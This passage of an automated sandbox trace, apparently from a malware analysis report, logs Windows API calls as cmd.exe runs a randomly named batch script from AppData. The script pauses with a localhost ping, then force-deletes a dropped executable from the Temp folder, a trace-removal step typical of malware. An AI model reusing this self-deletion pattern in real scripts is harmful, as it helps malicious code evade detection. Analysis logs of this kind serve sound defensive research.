dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0118.024] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0118.025] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 localhost", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cec14*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 localhost", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cec60 | out: lpCommandLine="ping -n 3 localhost", lpProcessInformation=0x1cec60*(hProcess=0x54, hThread=0x58, dwProcessId=0xef4, dwThreadId=0xef8)) returned 1 [0118.028] CloseHandle (hObject=0x58) returned 1 [0118.028] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0118.028] GetEnvironmentStringsW () returned 0x340970* [0118.028] FreeEnvironmentStringsW (penv=0x340970) returned 1 [0118.028] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0126.543] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1ceb54 | out: lpExitCode=0x1ceb54*=0x0) returned 1 [0126.543] CloseHandle (hObject=0x54) returned 1 [0126.543] _vsnwprintf (in: _Buffer=0x1cec9c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ceb60 | out: _Buffer="00000000") returned 8 [0126.543] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.543] GetEnvironmentStringsW () returned 0x342c28* [0126.544] FreeEnvironmentStringsW (penv=0x342c28) returned 1 [0126.544] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.544] GetEnvironmentStringsW () returned 0x342c28* [0126.544] FreeEnvironmentStringsW (penv=0x342c28) returned 1 [0126.544] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cebb8 | out: lpAttributeList=0x1cebb8) [0126.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.544] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.544] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.544] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.544] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.544] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.544] SetConsoleInputExeNameW () returned 0x1 [0126.544] GetConsoleOutputCP () returned 0x1b5 [0126.544] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.544] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.545] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.545] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.545] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.545] SetFilePointer (in: hFile=0x54, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.545] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.545] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0126.546] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x7c, lpOverlapped=0x0) returned 1 [0126.547] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.547] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n") returned 62 [0126.547] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.547] GetFileType (hFile=0x54) returned 0x1 [0126.547] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.547] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.548] _tell (_FileHandle=3) returned 83 [0126.548] _close (_FileHandle=3) returned 0 [0126.548] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf18c | out: _Buffer="\r\n") returned 2 [0126.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.548] GetFileType (hFile=0x7) returned 0x2 [0126.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf14c | out: lpMode=0x1cf14c) returned 1 [0126.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.549] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf178, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf178*=0x2) returned 1 [0126.549] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0126.549] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.549] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf188 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.549] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1cf188 | out: _Buffer=">") returned 1 [0126.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.549] GetFileType (hFile=0x7) returned 0x2 [0126.549] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.549] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf150 | out: lpMode=0x1cf150) returned 1 [0126.549] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.549] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1cf17c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1cf17c*=0x19) returned 1 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] GetFileType (hFile=0x7) returned 0x2 [0126.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.550] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3d4 | out: lpMode=0x1cf3d4) returned 1 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x34f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1cf400, lpReserved=0x0 | out: lpBuffer=0x34f008*, lpNumberOfCharsWritten=0x1cf400*=0x3) returned 1 [0126.550] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1cf40c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" ") returned 58 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] GetFileType (hFile=0x7) returned 0x2 [0126.550] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.550] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3cc | out: lpMode=0x1cf3cc) returned 1 [0126.550] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.550] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1cf3f8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf3f8*=0x3a) returned 1 [0126.551] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf42c | out: _Buffer="\r\n") returned 2 [0126.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.551] GetFileType (hFile=0x7) returned 0x2 [0126.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.551] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3ec | out: lpMode=0x1cf3ec) returned 1 [0126.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.551] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf418, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf418*=0x2) returned 1 [0126.551] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.551] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.551] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.551] GetConsoleTitleW (in: lpConsoleTitle=0x1cef9c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.551] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ce018, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.552] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x2020 [0126.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.552] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.552] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0x2020 [0126.552] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", fInfoLevelId=0x0, lpFindFileData=0x350554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x350554) returned 0x330aa8 [0126.552] DeleteFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 1 [0126.553] FindNextFileW (in: hFindFile=0x330aa8, lpFindFileData=0x350554 | out: lpFindFileData=0x350554) returned 0 [0126.553] GetLastError () returned 0x12 [0126.553] FindClose (in: hFindFile=0x330aa8 | out: hFindFile=0x330aa8) returned 1 [0126.554] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.554] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.554] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.554] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.554] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.554] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.554] SetConsoleInputExeNameW () returned 0x1 [0126.554] GetConsoleOutputCP () returned 0x1b5 [0126.554] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.554] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.554] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.554] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=83, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53 [0126.555] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x3e, lpOverlapped=0x0) returned 1 [0126.555] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9e6640, cbMultiByte=62, lpWideCharStr=0x4a9ec640, cchWideChar=8191 | out: lpWideCharStr="del /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\"\r\n") returned 62 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] GetFileType (hFile=0x54) returned 0x1 [0126.555] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.556] _tell (_FileHandle=3) returned 145 [0126.556] _close (_FileHandle=3) returned 0 [0126.556] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf18c | out: _Buffer="\r\n") returned 2 [0126.556] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.556] GetFileType (hFile=0x7) returned 0x2 [0126.556] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.556] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf14c | out: lpMode=0x1cf14c) returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf178, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf178*=0x2) returned 1 [0126.557] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0126.557] _vsnwprintf (in: _Buffer=0x4a9e5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf188 | out: _Buffer="C:\\Users\\EEBsYm5\\Desktop") returned 24 [0126.557] _vsnwprintf (in: _Buffer=0x4a9e5e70, _BufferCount=0x3e6, _Format="%c", _ArgList=0x1cf188 | out: _Buffer=">") returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] GetFileType (hFile=0x7) returned 0x2 [0126.557] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.557] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf150 | out: lpMode=0x1cf150) returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9e5e40*, nNumberOfCharsToWrite=0x19, lpNumberOfCharsWritten=0x1cf17c, lpReserved=0x0 | out: lpBuffer=0x4a9e5e40*, lpNumberOfCharsWritten=0x1cf17c*=0x19) returned 1 [0126.557] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.557] GetFileType (hFile=0x7) returned 0x2 [0126.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3d4 | out: lpMode=0x1cf3d4) returned 1 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x34f008*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x1cf400, lpReserved=0x0 | out: lpBuffer=0x34f008*, lpNumberOfCharsWritten=0x1cf400*=0x3) returned 1 [0126.558] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x1cf40c | out: _Buffer=" /f /q \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe\" ") returned 58 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] GetFileType (hFile=0x7) returned 0x2 [0126.558] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.558] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3cc | out: lpMode=0x1cf3cc) returned 1 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x3a, lpNumberOfCharsWritten=0x1cf3f8, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf3f8*=0x3a) returned 1 [0126.558] _vsnwprintf (in: _Buffer=0x4a9f4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf42c | out: _Buffer="\r\n") returned 2 [0126.558] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.558] GetFileType (hFile=0x7) returned 0x2 [0126.559] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0126.559] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf3ec | out: lpMode=0x1cf3ec) returned 1 [0126.559] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.559] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf418, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1cf418*=0x2) returned 1 [0126.559] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0126.559] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0126.559] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0126.559] GetConsoleTitleW (in: lpConsoleTitle=0x1cef9c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0126.559] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ce018, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce014*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0126.559] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0126.559] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.560] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0xffffffff [0126.560] GetLastError () returned 0x2 [0126.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp")) returned 0x2010 [0126.560] _wcsicmp (_String1="GYm4NxCU.exe", _String2=".") returned 57 [0126.560] _wcsicmp (_String1="GYm4NxCU.exe", _String2="..") returned 57 [0126.560] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\gym4nxcu.exe")) returned 0xffffffff [0126.560] GetLastError () returned 0x2 [0126.560] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\GYm4NxCU.exe", fInfoLevelId=0x0, lpFindFileData=0x350554, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x350554) returned 0xffffffff [0126.560] GetLastError () returned 0x2 [0126.560] _get_osfhandle (_FileHandle=2) returned 0xb [0126.560] GetFileType (hFile=0xb) returned 0x2 [0126.560] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0126.560] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cea14 | out: lpMode=0x1cea14) returned 1 [0126.560] _get_osfhandle (_FileHandle=2) returned 0xb [0126.560] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1cea48 | out: lpConsoleScreenBufferInfo=0x1cea48) returned 1 [0126.561] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0126.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.561] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.561] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.561] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.561] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.561] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.562] SetConsoleInputExeNameW () returned 0x1 [0126.562] GetConsoleOutputCP () returned 0x1b5 [0126.562] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.562] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.562] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\p0mhdE5X.cmd" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\p0mhde5x.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cf3d4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0126.562] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] SetFilePointer (in: hFile=0x54, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.562] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf3b8, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf3b8*=0x0, lpOverlapped=0x0) returned 1 [0126.562] GetLastError () returned 0x0 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] GetFileType (hFile=0x54) returned 0x1 [0126.562] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.562] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.563] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.563] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.563] ReadFile (in: hFile=0x54, lpBuffer=0x4a9e6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1cf39c, lpOverlapped=0x0 | out: lpBuffer=0x4a9e6640*, lpNumberOfBytesRead=0x1cf39c*=0x0, lpOverlapped=0x0) returned 1 [0126.563] GetLastError () returned 0x0 [0126.563] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.563] GetFileType (hFile=0x54) returned 0x1 [0126.563] _get_osfhandle (_FileHandle=3) returned 0x54 [0126.563] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0126.563] longjmp () [0126.563] _tell (_FileHandle=3) returned 145 [0126.563] _close (_FileHandle=3) returned 0 [0126.563] CmdBatNotification () returned 0x0 [0126.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.563] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.563] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.563] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0126.564] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.564] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0126.564] SetConsoleInputExeNameW () returned 0x1 [0126.564] GetConsoleOutputCP () returned 0x1b5 [0126.564] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0126.564] SetThreadUILanguage (LangId=0x0) returned 0x409 [0126.564] exit (_Code=0) Process: id = "61" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16840" os_pid = "0xec8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "57" os_parent_pid = "0xe5c" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\WlLsor5U.cmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8803 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8804 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8805 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 8806 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = 